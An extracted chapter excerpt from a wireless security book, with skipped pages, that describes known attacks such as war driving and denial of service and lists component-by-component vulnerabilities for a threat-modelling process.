Escolar Documentos
Profissional Documentos
Cultura Documentos
Vulnerabilities 10
. . . man will occasionally stumble over the truth, but usually manages to pick
himself up, walk over or around it, and carry on.
—Winston S. Churchill
THE SECOND PHASE OF THE I-ADD SECURITY PROCESS is the analyze phase.
During this phase you examine known attacks, vulnerabilities, and theoretical attacks
in order to generate protections and mitigations. These protections and mitigations are
methods or procedures used to inhibit an attacker’s ability to exploit a vulnerability or
perform an attack. The protections and mitigations should be identified without con-
sideration for other factors, such as cost, limits to functionality, or time to implement.
Trade-offs are evaluated and decisions are made during the next I-ADD phase, the
define phase.
Known Attacks
Identifying known attacks requires research of security-related Web sites, papers, and
trade journals. Although currently known attacks are few in number, relative to wired
systems, they are likely to grow as wireless systems become more prevalent and pro-
vide a richer target for the attacker community. The known attacks we cover here are
specific to the wireless portions of the system. The Web servers, backend servers, and
gateways are all subject to known attacks specific to their hardware platform, operat-
ing systems, and ancillary applications. The importance of specifically examining
known attacks separate from theoretical attacks is that known attacks are likely to be
attempted by an attacker when targeting a wireless system. Therefore, known attacks
deserve a higher priority when making trade-offs during the next I-ADD phase.
187
188 A N A LY Z E AT TA C K S A N D V U L N E R A B I L I T I E S
Device Theft
Device theft is just as it sounds, the physical theft of the device by an attacker. Fortu-
nately, this is not a concept new or unique to wireless devices or systems, so the need
for protection of wireless devices and systems against physical theft is intuitive to
device and system manufacturers. Unfortunately, devising devices or systems resistant
to theft is very difficult.
Several mitigations can be employed to minimize the threat. We will not spend
much time stating the obvious, such as locking and alarming rooms that house
equipment.
War Driving
In the 1980s, malicious types began war dialing, calling phone numbers at random in
an attempt to locate unprotected modems and gain access to networks. The early
2000s version of war dialing is war driving, roaming around with a laptop, wireless
NIC, and an antenna and attempting to gain access to wireless networks. As we have
discussed, the vast majority of wireless networks deployed do not use WEP or use
WEP without implementing RSA’s Fast Packet Keying solution to (more or less) secu-
rity. With a $100–150 wireless NIC set in promiscuous mode and a cheap parabolic
grid antenna from Radio Shack, hackers have gained access to thousands of wireless
networks across the United States. In populated areas, war drivers have used simple
GPS applications in combination with the wireless NIC and antennae and have suc-
cessfully mapped the location of thousands of wireless networks to which they can
gain access. No esoteric software or hardware is required. A software application
called AirSnort has the ability to analyze the intercepted WEP traffic and, after collect-
ing enough data, even determine the root password for the wireless system.
Denial of Service
Denial of service is a class of attacks that take many forms, from subtle to obvious. An
obvious denial of service attack against a wireless system would be to sever the coax
cable on the tower between the transceiver and the antenna. This definitely would
deny service to anyone wanting to use that particular tower. A more subtle attack
V U L N E R A B I L I T I E S A N D T H E O R E T I C A L AT TA C K S 189
would be to tie up the system with service requests or to spread a bogus e-mail such
as “New and Destructive Virus,” explaining that you should e-mail everyone you know
so that they can protect themselves. The desired result is that the system becomes so
bogged down with these e-mails that legitimate traffic cannot be accommodated.
Another popular denial of service attack is the “Please help, my child is dying.” An
e-mail is sent saying that someone, usually a hapless child, is suffering from a terrible
affliction. The e-mail goes on to say that a corporation has agreed to provide X amount
for every e-mail it receives regarding this child, so please forward this e-mail to every-
one you know so that this child can be saved. The desired result is to overwhelm the
corporation’s servers and cause them to crash.
User Interface
The user interface should be examined in its two parts: the physical interface and
access to the user interface. These two have different issues that should be acknowl-
edged for completeness of your risk assessment.
Offline Functions
Malicious User
Personal data is vulnerable to a malicious user who has gained access to the device.
Recall that malicious user is a catchall term encompassing a variety of activities.
Although this simple statement is adequate for describing the vulnerability, the com-
plexity of the role becomes important and should not be forgotten when generating
mitigations and protections or performing the security-functionality trade-offs. For ex-
ample, a malicious user may pose as a member of one of the legitimate functional
roles and become the functional equivalent of one of the malicious roles just dis-
cussed.
Online Functions
Personal Data Being Sent
This target is personal data as it is in transit. You will notice that all the previous roles
are present, with the addition of a few others because of the data’s increased exposure
during transport.
Malicious User
Personal data is vulnerable to a malicious user who has access to, or has built a
receiver that can monitor, the transmission of the PDA and can reconstruct the data
transmitted and received. Again, a malicious user can assume any of the preceding
malicious roles to gain access necessary to exploit a vulnerability.
distinction separates it from similar activities occurring against the service provider,
which we will discuss shortly.
Malicious User
Access to network and online services are vulnerable to a malicious user. A malicious
user may gain access to the device and retrieve network and online services creden-
tials, to be used on another device or at a later time. A malicious user may monitor
transmissions, discussed under “Malicious User” for personal data being sent to obtain
network and online services credentials. Again, a malicious user can assume any of the
preceding malicious roles to gain access necessary to exploit a vulnerability.
Transceiver
The Transceiver Itself
Malicious User
The transceiver is vulnerable to manipulation or modification by a malicious user. For
example, this may be done to assist a man-in-the-middle attack.
V U L N E R A B I L I T I E S A N D T H E O R E T I C A L AT TA C K S 195
Malicious User
The transceiver is vulnerable to manipulation or modification by a malicious user. For
example, this may be done to deny service to areas or individuals at crucial times.
Malicious User
The transceiver is vulnerable to manipulation or modification by a malicious user. For
example, a malicious user may obtain access credentials to utilize the service without
paying for the privilege.
For example, service provider subscribers receive stock quotes as part of their service
plan. OMS personnel with access to the quote server that provides this service could
alter the server to deliver anything in addition to, or in place of, the stock quotes.
Malicious User
The service provider is vulnerable to malicious users gaining network access to allow
them access to the service provider’s subscribers, either by these malicious users’ act-
ing in one of the preceding roles or by exploiting a vulnerability in the overall service
provider’s system.
Transceiver
Recall that there were no targets for the transceiver beyond those identified for the
higher-level functional block.
Administrative Server
By administrative server, we are referring to the billing, maintenance, and support sys-
tems associated with keeping the wireless infrastructure functional.
User-Specific Data
User-specific data is information such as credit card numbers, address, finances, call
and access log information that resides on the administrative server.
V U L N E R A B I L I T I E S A N D T H E O R E T I C A L AT TA C K S 197
Malicious User
User-specific data resident on the administrative server is vulnerable to malicious
users’ gaining access to the service provider’s network and thereby accessing user-
specific data. The service provider’s network access may be obtained by these mali-
cious users’ acting in one of the preceding roles or exploiting a vulnerability in the
overall service provider’s system.
Malicious User
Corporate proprietary data and resources resident on the administrative server are
vulnerable to malicious users gaining access to the service provider’s network, and
thereby access to corporate proprietary data and resources. The service provider’s net-
work access may be obtained by these malicious users’ acting in one of the preceding
roles or exploiting a vulnerability in the overall service provider’s system.
Network Server
User-Specific Data
User-specific data is information such as credit card numbers, addresses, and data such
as e-mail and Web traffic that transits the network server.
Malicious User
User-specific data is vulnerable to a malicious user who has access to, or has assumed
one of the preceding roles to get access to, the network server.
Malicious User
Corporate proprietary data and resources resident on the administrative server are
vulnerable to malicious users gaining access to the service provider’s network, and
thereby access to corporate proprietary data and resources. The service provider’s net-
work access can be obtained by these malicious users’ acting in one of the preceding
roles or exploiting a vulnerability in the overall service provider’s system.
cover the vulnerabilities for the Web server and backend server. Further, no additional
vulnerability is associated with having those servers linked to a wireless system (with
the exception of no longer needing physical access) than to a totally wired system.
Malicious User
The gateway is vulnerable to manipulation or modification by a malicious user
who has assumed one of the preceding roles or has otherwise gained access to the
gateway.
User-Specific Data
Malicious User
User-specific data is vulnerable to a malicious user who has access to, or has assumed
one of the preceding roles to get access to, the gateway.
User Data
Malicious User
User data is vulnerable to a malicious user who has access to, or has assumed one of
the preceding roles to get access to, the gateway.
Malicious User
Corporate proprietary data and resources are vulnerable to a malicious user who has
access to, or has assumed one of the preceding roles to get access to, the gateway.
Malicious User
Third-party data is vulnerable to a malicious user who has access to, or has assumed
one of the preceding roles to get access to, the gateway.
V U L N E R A B I L I T I E S A N D T H E O R E T I C A L AT TA C K S 203